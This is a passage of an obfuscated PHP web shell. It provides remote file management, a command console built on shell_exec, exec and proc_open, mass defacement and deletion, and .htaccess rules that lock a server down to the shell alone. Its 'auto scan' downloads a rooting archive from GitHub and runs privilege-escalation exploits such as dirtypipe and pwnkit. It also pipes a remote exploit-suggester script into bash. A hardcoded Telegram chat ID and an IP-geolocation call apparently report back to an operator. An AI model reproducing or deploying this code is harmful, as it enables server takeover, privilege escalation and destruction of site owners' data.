\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>\xa\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a>\xa	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_folder'><i class='bi bi-calendar'></i></a> 
\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a>\xa			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa	\x9</div>\xa\x9\x9<br>\xa\x9	\x9<i class='bi bi-folder-fill'></i>:&nbsp;" . basename($dir) . " 
\x9	</br>\xa\x9	<form method='POST'> 
			<div class='input-group'> 
		\x9	<input class='form-control btn-sm' type='text' value='" . basename($dir) . "' name='r_d' {$_r}> 
	\x9\x9\x9<button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button> 
	\x9\x9</div> 
\x9\x9</form>"; } goto IIg7D; ygzyS: svZje: goto uLPNS; hogqD: if (isset($_7["dirnew"])) { s(); if (isset($_7["create"])) { $name = $_7["name_dir"]; foreach ($name as $name_dir) { $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $name_dir); $fd = @mkdir($folder); } if ($fd) { echo "<script>window.location='?path=" . hex($path) . "'</script>"; } else { echo "<strong>Create dir</strong> fail! " . er() . "</div>"; } } echo " 
	\x9<div class='mb-3'> 
\x9		<form method='POST'>\xa		\x9\x9<i class='bi bi-folder'></i> Name directory: 
\x9\x9\x9	<div class='input-group mb-3'> 
\x9	\x9	\x9<input class='form-control form-control-sm' type='text' name='name_dir[]' placeholder='Dir name' {$_r}> 
			\x9\x9<input class='btn btn-outline-light btn-sm' type='submit' name='create' value='create dir'>\xa	\x9		</div> 
\x9\x9\x9</form>\xa	\x9</div>"; } goto BGEv7; ljtbs: A6NGf: goto qK5rB; hyWxJ: goto I1rhv; goto MbUDf; nEeZx: goto A6NGf; goto fAweN; cK2rs: QnGHN: goto k4sSD; UuSuo: adv1G: goto bKjHY; REB1u: if ($_7["action"] == "chmod") { s(); $fileToChmod = $file; $currentChmod = fileperms($fileToChmod); $FileChmod = substr(sprintf("%o", $currentChmod), -4); if (isset($_POST["cehamot"])) { if (isset($_7["new_chmod"])) { $newChmod = $_7["new_chmod"]; $newChmodOctal = octdec($newChmod); if (is_numeric($newChmod)) { if (chmod($fileToChmod, $newChmodOctal)) { echo "<strong>Chmod file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Chmod file</strong> fail! " . er() . "</div>"; } } else { echo "<strong>Check Chmod Value</strong> fail! " . er() . "</div>"; } } } echo "\xa\x9	<div class='btn-group'>\xa	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>\xa\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a> 
			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a> 
\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>\xa	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>\xa	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a> 
	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>\xa\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a> 
		</div>\xa\x9\x9<br> 
\x9\x9<i class='bi bi-file-earmark'></i>:&nbsp;" . basename($file) . " 
	\x9</br> 
\x9\x9<form method='POST'> 
\x9		<div class='input-group'> 
			\x9<input class='form-control btn-sm' type='text' name='new_chmod' value='{$FileChmod}'><button class='btn btn-outline-light btn-sm' type='submit' name='cehamot'><i class='bi bi-arrow-return-right'></i></button> 
		\x9</div> 
\x9\x9</form>"; } goto TQyOY; ZFgRB: KUtnK: goto fq2I4; lfNQy: goto aAe5o; goto dqQaX; i51iK: aWW6H: goto g0WyW; emyW3: goto WQ2ja; goto y5yZj; vYHYh: goto bYTED; goto zmKJM; g4QUG: GIn5m: goto nwitw; uKnpG: $domen = $_SERVER["SERVER_NAME"]; goto qVaIQ; Z2Byx: McCnR: goto QKxFT; upcq7: goto jEqlm; goto L5SY1; nxYqg: @ini_set("log_errors", 0); goto BBEnD; NIMXe: goto If5hf; goto SH6LF; TTnxI: goto ANvpy; goto HJFtS; pY6gl: goto zuGew; goto WSsCt; SGKBz: if (!$GLOBALS["fungsi"][5]("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } goto yhECU; Msa02: goto H5D0K; goto t2E2c; S5Onc: goto KUtnK; goto nwFWT; Niw5_: L40lb: goto BrKM0; y5yZj: KwLgJ: goto uKnpG; JsI0e: HLgyN: goto zsOiR; EOe4J: goto fYypx; goto pNXU3; CChkk: oKwUZ: goto aY1lk; aWagg: KmVW5: goto CPPBu; IPiVI: goto y6Y_L; goto eW7Zp; L8iNG: goto s7SaO; goto UW4lC; iZFXr: goto vQdCF; goto zZOvt; rW9GQ: goto KmVW5; goto v_KJh; xQEXE: goto T0L1a; goto Uy2Ph; YyM5i: goto rPurp; goto Q8GKs; ZrHOp: d2xQL: goto eCIsx; KFLyg: goto Jm_Qb; goto WkiLV; U6VA6: C1bTU: goto boRyc; I8XLB: $gcw = "getcwd"; goto MvvYi; zN3tu: RXoFU: goto iF5O8; m_lQ1: goto RXkre; goto O8WKF; ne7no: echo "&nbsp;[ " . w($path, p($path)) . " ]"; goto S5Onc; q0gSw: goto aKeCl; goto m31q9; CLzcZ: I1rhv: goto R5vvF; NcwTG: fBRrX: goto UwA0N; OYSHy: goto SwU8B; goto ywaqh; gjAoI: goto C1bTU; goto M9GSH; fxMqf: goto nGILA; goto SgzDb; wduFL: goto jy7fd; goto ezQTk; R5vvF: header("X-XSS-Protection: 0"); goto nDMp2; IeY8l: if (isset($_7["left"])) { session_start(); session_destroy(); echo "<script>window.location="" . $_SERVER["PHP_SELF"] . "";</script>"; } goto hYe9r; A8SxU: IAa_h: goto pJIHO; axbi8: rISkk: goto XMFJS; IFtzp: $scdir = explode("/", $dir); goto cOq2q; nuhVX: goto EGOzL; goto JsI0e; jSAwj: goto wDzwC; goto goYyD; n9cie: goto HfHct; goto UuSuo; cGdUr: wDzwC: goto ORaqL; qqZ23: $hitung_array = count($Array); goto I8bMz; Ql4_q: $ch = curl_init(); goto K6D6_; jXYO1: $scand = scandir($path); goto c6a2h; nDMp2: goto lKeYb; goto dLv3E; NFI9A: $x_path = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto rh9KY; eCIsx: $pxex = exe("pkexec --version") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto qAMhz; SgzDb: RXkre: goto W3XcD; lbxMx: goto oKwUZ; goto RicPt; XTWbw: echo " 
	\x9<div class='container-fluid'> 
		\x9<div class='corner anu py-3'> 
			\x9<button class='btn btn-outline-light btn-sm' data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'> 
\x9\x9		<i class='bi bi-info-circle'></i> info <i class='bi bi-chevron-down'></i>\xa\x9	\x9\x9</button> 
		\x9</div> 
	\x9	<div class='collapse text-dark mb-3' id='collapseExample'>\xa\x9\x9\x9\x9<div class='box shadow bg-light p-3 rounded-3'> 
		\x9	System: <gr>{$kernel}</gr><br>\xa		\x9\x9User: <gr>{$user}</gr> ({$uid}) | Group: <gr>{$group}</gr> ({$gid})<br> 
\x9\x9	\x9PHP Version: <gr>{$phpver}</gr> PHP os: <gr>{$phpos}</gr><br>\xa\x9\x9	\x9Software: <gr>{$soft}</gr><br>\xa		\x9	Domain: <gr>{$domen}</gr><br> 
		\x9\x9Server Ip: <gr>{$ip}</gr><br> 
	\x9	\x9Your Ip: <gr>{$yip}</gr><br>\xa	\x9\x9\x9City: <gr>{$city}</gr><br> 
\x9\x9		Safe Mode: {$sm}<br>\xa		\x9	MySQL: {$sql} | Perl: {$pl} | WGET: {$wget} | CURL: {$curl} | Python: {$py} | Pkexec: {$pxex} | GCC: {$gcc}<br>\xa\x9	\x9\x9Disable Function:<br><pre>{$disfc}</pre>\xa	\x9		</div> 
	\x9	</div> 
			\x9</div>\xa	\x9	\x9<div class='text-center'>\xa\x9\x9	<div class='btn-group'> 
\x9\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=upload'><i class='bi bi-upload'></i> Upload</a>\xa\x9\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=uploadvialink'><i class='bi bi-upload'></i> Upload Via Link</a> 
	\x9	</div>\xa	\x9\x9<div class='btn-group'> 
		\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=deface'><i class='bi bi-exclamation-diamond'></i> Mass deface</a> 
			\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=delete'><i class='bi bi-trash'></i> Mass delete</a> 
\x9		</div> 
\x9		<div class='btn-group'>\xa\x9	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=network'><i class='bi bi-hdd-network'></i> Network</a>\xa\x9			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=cmd'><i class='bi bi-terminal'></i> Console</a> 
	\x9\x9</div> 
\x9	\x9<div class='btn-group'> 
\x9	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=lockshell'><i class='bi bi-file-earmark-lock'></i> Lock Shell</a> 
	\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=unlockshell'><i class='bi bi-file-earmark'></i> Unlock Shell</a> 
		\x9</div> 
\x9\x9	<div class='btn-group'>\xa\x9\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=phpmailer'><i class='bi bi-envelope'></i> PHP Mailer</a>\xa		\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=searchbyEXT'><i class='bi bi-braces'></i> Search By EXT</a> 
\x9\x9\x9</div><br><br> 
	\x9	<div class='btn-group'> 
		\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=createhates'><i class='bi bi-file-earmark-plus'></i> Create Htaccess</a> 
		\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=createuploader'><i class='bi bi-file-earmark-plus'></i> Create Uploader</a>\xa	\x9\x9</div>\xa	\x9	<div class='btn-group'> 
\x9			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=root_file'><i class='bi bi-file-earmark'></i> Green All File</a>\xa		\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=root_folders'><i class='bi bi-folder'></i> Green All Folders</a>\xa\x9	\x9</div>\xa		\x9<div class='btn-group'>\xa\x9\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=dark_file'><i class='bi bi-file-earmark-lock'></i> Lock All File</a>\xa		\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=dark_folders'><i class='bi bi-folder-x'></i> Lock All Folders</a></div> 
		\x9<div class='btn-group'>\xa			\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=scan_root'><i class='bi bi-search'></i> Scan root</a> 
			</div> 
			<div class='btn-group'> 
		\x9	<a class='btn btn-outline-light btn-sm' href='?logout=true'><i class='bi bi-box-arrow-in-left'></i> Logout</a>\xa		\x9</div> 
		</div>"; goto tdhtT; rnVAT: function ok() { echo "<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>"; } goto YyM5i; RharQ: lRnUM: goto SGKBz; uxESJ: cmB2X: goto sV8KT; YX2r_: goto Gm74y; goto apWbg; SnFRN: header("Content-Type: text/html; charset=UTF-8"); goto xhFtK; dJHtg: s_cq9: goto u1Gp4; fAweN: HfHct: goto IeY8l; YdWhL: $chatId = "5571531961"; goto Wn18T; BEYcg: goto PkFhD; goto pYVJI; TMPU0: $dir = str_replace("\", "/", $dir); goto VB_Zh; H7C5X: KOMIS: goto nHank; KZprX: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto FEDzx; AfB8N: function s() { echo "<style>table{display:none;}</style><div class="table-responsive"><hr></div>"; } goto sC6rm; twjlG: goto rISkk; goto H7C5X; qMxX4: lhjuO: goto SnFRN; Y_ZUF: goto d2xQL; goto D6fdE; aZblL: $yip = $_SERVER["REMOTE_ADDR"]; goto Pso6J; G14V6: goto nWNfK; goto no2rs; DFo23: OY_it: goto FEUrJ; fP29U: $py = exe("python --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto Y_ZUF; EBffy: goto eo8KT; goto qM7Rx; Tyt1q: goto SoWRM; goto Cx1VN; tbtc1: HgnMn: goto wYXrr; NIcgu: if (isset($_GET["id"]) && $_GET["id"] === "dark_file") { $newFilePermissions = 292; changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); echo "Permissions changed for all files in the current directory."; } goto lfNQy; UW4lC: pvj3a: goto MFdHq; osecG: goto KzNHr; goto toPda; G0rig: KmDAz: goto B2JgX; U3NfY: goto tiJmV; goto axbi8; cNchv: kAEUT: goto G3vw5; pIeXA: if (isset($_7["opn"]) && $_7["opn"] != '' && $_7["action"] == "download") { @ob_clean(); $file = $_7["opn"]; header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($file)); readfile($file); die; } goto OYSHy; Z5_Jj: goto RXoFU; goto bvDAd; ddA3e: goto KwLgJ; goto EHvWy; BUTIn: Jm_Qb: goto MBmU1; xJU6c: $paths = explode("/", $path); goto FcjTk; AT4g5: d9Nwk: goto TaKsn; nI5xl: if ($_7["id"] == "cmd") { s(); $cmdResult = ''; $command = ''; if (!empty($_POST["cmd"])) { $command = htmlspecialchars($_POST["cmd"], ENT_QUOTES, "UTF-8"); $cmdResult = shell_exec($command . " 2>&1"); if ($cmdResult === null) { $output = array(); $return_var = 0; exec($command, $output, $return_var); $cmdResult = implode("\xa", $output); if ($cmdResult === null) { $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($command, $descriptorspec, $pipes); if (is_resource($process)) { $cmdResult = stream_get_contents($pipes[1]); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); $return_value = proc_close($process); if ($return_value !== 0) { $cmdResult = "Error: Non-zero return value ({$return_value})"; } } else { $cmdResult = "Error: Failed to open process with proc_open"; } } } } echo " 
\x9		<div class='mb-3'> 
		\x9	<form method='POST'>\xa\x9	\x9\x9<div class='input-group d-flex gap-2'> 
\x9			<label for='cmd'>{$user}@{$domen}: ~ $</label>\xa				</div> 
\x9\x9	\x9\x9<div class='input-group mb-3'>\xa	\x9\x9	\x9	<input class='form-control btn-sm' type='text' name='cmd' value='" . htmlspecialchars($_POST["cmd"], ENT_QUOTES, "UTF-8") . "' placeholder='whoami' {$_r}>\xa		\x9	\x9	<button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>\xa	\x9\x9		</div>\xa		\x9\x9</form>"; if (!empty($cmdResult)) { echo " 
			\x9<div class='container-fluid language-javascript'> 
	\x9\x9\x9	<div class='shell mb-3'> 
		\x9\x9		<pre style='font-size:10px;'><gr>~</gr>$&nbsp;<rd>{$command}</rd><br><code>" . htmlspecialchars($cmdResult, ENT_QUOTES, "UTF-8") . "</code></pre>\xa\x9		\x9	</div>\xa		\x9	</div>"; } elseif ($_SERVER["REQUEST_METHOD"] == "POST") { echo " 
	\x9\x9	<div class='container-fluid language-javascript'>\xa	\x9		\x9<div class='shell mb-3'> 
	\x9	\x9	\x9<pre style='font-size:10px;'><code>No result</code></pre>\xa		\x9		</div> 
\x9		\x9</div> 
		\x9</div>"; } } goto bFGp_; L5SY1: FkKSL: goto Qdp7W; Xtayd: function sz($byt) { $typ = array("B", "KB", "MB", "GB", "TB"); for ($i = 0; $byt >= 1024 && $i < count($typ) - 1; $byt /= 1024, $i++) { } return round($byt, 2) . " " . $typ[$i]; } goto XGHY4; dLv3E: bYTED: goto jXYO1; iLBez: goto iYskO; goto WszL8; zF6Wn: goto C9DqF; goto iI08Z; Mdw2u: goto d9Nwk; goto wQyvE; C9c37: TUS18: goto NIcgu; boq4M: $data = json_decode($response, true); goto eavUF; ywaqh: ZT_p6: goto sBdeq; dqJ0W: E53fJ: goto e4Pf2; FcjTk: goto cmB2X; goto c9WMJ; XqS3f: goto pvj3a; goto r3kFk; BrKM0: set_time_limit(0); goto H0PkX; SMgdl: echo "\xa	\x9<div class="table-responsive">\xa\x9	<table class="table table-hover table-dark text-light">\xa	\x9<thead> 
\x9\x9<tr>\xa\x9		<td class="text-center">name</td><td class="text-center">type</td> 
\x9	\x9\x9<td class="text-center">last edit</td> 
		\x9	<td class="text-center">size</td>\xa\x9\x9\x9\x9<td class="text-center">owner<gr>/</gr>group</td>\xa		\x9	<td class="text-center">permision</td>\xa\x9	\x9<td class="text-center">action</td>\xa\x9	</tr> 
\x9	</thead> 
\x9	<tbody class="text-nowrap"> 
\x9\x9<tr>\xa\x9\x9	<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?dir=" . dirname($dir) . "">..</a></td><td></td><td></td><td></td><td></td><td></td><td class="text-center">\xa\x9\x9\x9\x9<div class="btn-group">\xa	\x9\x9		<a class="btn btn-outline-light btn-sm" href="?filenew&path=" . $dir . ""><i class="bi bi-file-earmark-plus-fill"></i></a>\xa					<a class="btn btn-outline-light btn-sm" href="?dirnew&path=" . $dir . ""><i class="bi bi-folder-plus"></i></a> 
\x9\x9\x9\x9</div> 
\x9		</td>\xa\x9	</tr>"; goto o0h0r; Wn18T: goto HD1QB; goto gBg7t; sV8KT: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<i class='bi bi-hdd-rack'></i>:<a class='text-decoration-none text-light' href='?path=" . hex("/") . "'>/</a>"; continue; } if ($pat == '') { continue; } echo "<a class='text-decoration-none' href='?path="; for ($i = 0; $i <= $id; $i++) { echo hex($paths[$i]); if ($i != $id) { echo hex("/"); } } echo "'>" . $pat . "</a>/"; } goto L8iNG; K6D6_: goto XBCqU; goto XtGrk; W3XcD: if ($_7["action"] == "view") { s(); echo "\xa		<div class='btn-group'> 
	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>\xa	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a> 
\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>\xa\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a> 
	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>\xa		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a> 
	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a> 
	\x9</div>\xa\x9	<br> 
			<i class='bi bi-file-earmark'></i>:&nbsp;" . basename($file) . "\xa	\x9</br> 
\x9\x9<div class='bg-dark'>\xa			<div class='container-fluid language-javascript'> 
\x9\x9	\x9<textarea rows='15' class='form-control' disabled=''>" . htmlspecialchars($fungsi[0]($file)) . "</textarea>\xa\x9\x9	</div>\xa	\x9</div>"; } goto G6W2I; y9uy4: if (isset($_GET["dir"]) && $_GET["id"] == "scan_root") { ob_implicit_flush(); ob_end_flush(); s(); echo "\xa\x9	\x9<div class='text-center'> 
		\x9\x9<div class='btn-group mb-3'>\xa\x9	\x9\x9	<a class='btn btn-outline-light btn-sm' href='" . $_SERVER["REQUEST_URI"] . "&id_two=autoscan'><i class='bi bi-bug'></i> Auto scan</a>\xa\x9				<a class='btn btn-outline-light btn-sm' href='" . $_SERVER["REQUEST_URI"] . "&id_two=scansd'><i class='bi bi-search'></i> Scan SUID</a>\xa\x9	\x9\x9	<a class='btn btn-outline-light btn-sm' href='" . $_SERVER["REQUEST_URI"] . "&id_two=esg'><i class='bi bi-search'></i> Exploit suggester</a> 
\x9\x9\x9\x9</div> 
\x9		</div>"; if (!$GLOBALS["fungsi"][5]("proc_open")) { echo "<center class='anu'>Command is Disabled !</center>"; } if (!is_writable($path)) { echo "<center class='anu'>Current Directory is Unwriteable !</center>"; } if (isset($_GET["id_two"]) && $_GET["id_two"] == "autoscan") { if (!file_exists($path . "/rooting/")) { mkdir($path . "/rooting"); exe_root("wget https://raw.githubusercontent.com/hekerprotzy/rootshell/main/auto.tar.gz", $path . "/rooting"); exe_root("tar -xf auto.tar.gz", $path . "/rooting"); if (!file_exists($path . "/rooting/netfilter")) { die("<center class='anu'>Failed to Download Material !</center>"); } } echo "\xa\x9	\x9	<div class="container-fluid language-javascript"> 
\x9\x9	\x9	<div class="shell mb-3"> 
\x9	\x9		\x9<pre style="font-size:10px;"><code>Netfilter : " . exe_root("timeout 10 ./rooting/netfilter", $path) . "Ptrace : " . exe_root("echo id | timeout 10 ./rooting/ptrace", $path) . "Sequoia : " . exe_root("timeout 10 ./rooting/sequoia", $path) . "OverlayFS : " . exe_root("echo id | timeout 10 ./overlayfs", $path . "/rooting") . "Dirtypipe : " . exe_root("echo id | timeout 10 ./rooting/dirtypipe /usr/bin/su", $path) . "Sudo : " . exe_root("echo 12345 | timeout 10 sudoedit -s Y", $path) . "Pwnkit : " . exe_root("echo id | timeout 10 ./pwnkit", $path . "/rooting") . @exe("rm -rf ./rooting | timeout 10 ") . "</code></pre>\xa	\x9\x9	\x9</div> 
	\x9\x9	</div>"; } elseif (isset($_GET["id_two"]) && $_GET["id_two"] == "scansd") { echo "<center class="anu">[+] Scanning ...</center>"; echo "\xa	\x9	\x9<div class="container-fluid language-javascript"> 
\x9\x9	\x9	<div class="shell mb-3">\xa\x9\x9	\x9\x9\x9<pre style="font-size:10px;"><code>" . exe_root("find / -perm -u=s -type f 2>/dev/null", $path) . "</code></pre> 
\x9		\x9	</div> 
\x9\x9\x9	</div>"; } elseif (isset($_GET["id_two"]) && $_GET["id_two"] == "esg") { echo "<center class="anu">[+] Loading ...</center>"; echo " 
\x9			<div class="container-fluid language-javascript"> 
				\x9<div class="shell mb-3">\xa		\x9			<pre style="font-size:10px;"><code>" . exe_root("curl -Lsk http://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash", $path) . "</code></pre> 
\x9\x9\x9\x9	</div> 
\x9			</div>"; } } goto pY6gl; WkiLV: tiJmV: goto YMAqF; cKSrB: Q8Vdd: goto ne7no; Lwfik: @ini_set("output_buffering", 0); goto G14V6; J7ByC: QLr2x: goto ZNsnh; k4sSD: for ($i = 0; $i < $hitung_array; $i++) { $fungsi[] = unhex($Array[$i]); } goto Iu50C; PoI1u: $location_api_url = "http://ip-api.com/json/{$ip_public}"; goto iL_4F; J7c2r: C9DqF: goto xk9iT; MBmU1: date_default_timezone_set("Asia/Jakarta"); goto osASh; hYe9r: goto HdaTq; goto g4QUG; yd57J: aKeCl: goto eWOz0; p_X1N: goto kfJtT; goto VcPEY; FmZMv: function p($file) { $p = fileperms($file); if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } goto osP09; z1UDJ: IP7wT: goto xA8V1; PyOJP: if ($_7["id"] == "createhates") { s(); if (isset($_7["bikin"])) { $selectedContent = isset($_7["content"]) ? $_7["content"] : ''; $isiFile = ''; $namafile = isset($_POST["namafile"]) ? $_POST["namafile"] : ''; if ($selectedContent == "content1") { $isiFile = "<Files ~ '\.(xml|css|jpe?g|png|gif|js|pdf|phtml|html|shtml|php5|php)$'> 
Allow from all\xa</Files>"; } elseif ($selectedContent == "content2") { $isiFile = "<FilesMatch '.*\.(phtml|php|PhP|php5|suspected)$'> 
Order Allow,Deny\xaDeny from all\xa</FilesMatch> 
<FilesMatch '^({$namafile})$'>\xaOrder Allow,Deny\xaAllow from all\xa</FilesMatch>"; } $setNama = ".htaccess"; $result = file_put_contents($setNama, $isiFile); chmod($setNama, 292); if ($result !== false) { echo "<strong>Create file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Create file</strong> fail! " . er() . "</div>"; } } echo "<div class='mb-3'> 
\x9\x9\x9<u>Defense Shell</u> 
		\x9<form method='POST' id='defenseShellForm'>\xa\x9	\x9\x9<input type='hidden' name='createhates' value='1'> 
\x9		\x9<div class='d-grid gap-2'> 
		\x9\x9\x9<label><input type='radio' name='content' value='content1' checked onclick='toggleShellNameInput(false)'> htaccess Allow All</label>\xa\x9		\x9\x9<label><input type='radio' name='content' value='content2' onclick='toggleShellNameInput(true)'> htaccess Only Allow Your Shell(enter name shell before create!!)</label> 
		\x9\x9	<label>use | if you have 2 files</label>\xa	\x9\x9	\x9<label>example:</label>\xa	\x9\x9	\x9<label><strong>index.php|indeex.php</strong> / <strong>aa.php|bb.php|cc.php</strong></label> 
\x9		\x9\x9<label id='namafile' for='namafile'>Shell Name: <input class='form-control form-control-sm' type='text' name='namafile'></label> 
	\x9			<input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='create'> 
	\x9		</div> 
		\x9</form>\xa\x9\x9</div>"; } goto T6cfq; PpvmR: goto McCnR; goto A8SxU; O2TiW: goto qmsSx; goto EvKXK; Mq334: foreach ($scand as $dir) { $dt = date("d-m-Y G:i", filemtime("{$path}/{$dir}")); if (strlen($dir) > 50) { $_d = substr($dir, 0, 50) . "..."; } else { $_d = $dir; } if ($GLOBALS["fungsi"][5]("posix_getpwuid")) { $downer = @posix_getpwuid(fileowner("{$path}/{$dir}")); $downer = $downer["name"]; } else { $downer = fileowner("{$path}/{$dir}"); } if ($GLOBALS["fungsi"][5]("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup("{$path}/{$dir}")); $dgrp = $dgrp["name"]; } else { $dgrp = filegroup("{$path}/{$dir}"); } if (!$fungsi[1]($path . "/" . $file)) { continue; } $size = filesize($path . "/" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } if (!$fungsi[1]($path . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo " 
	\x9<tr> 
\x9\x9\x9<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href='?path=" . hex($path . "/" . $dir) . "'>{$_d}</a></td> 
			<td class='text-center'>dir</td>\xa	\x9	<td class='text-center'>{$dt}</td>\xa\x9		<td class='text-center'>-</td> 
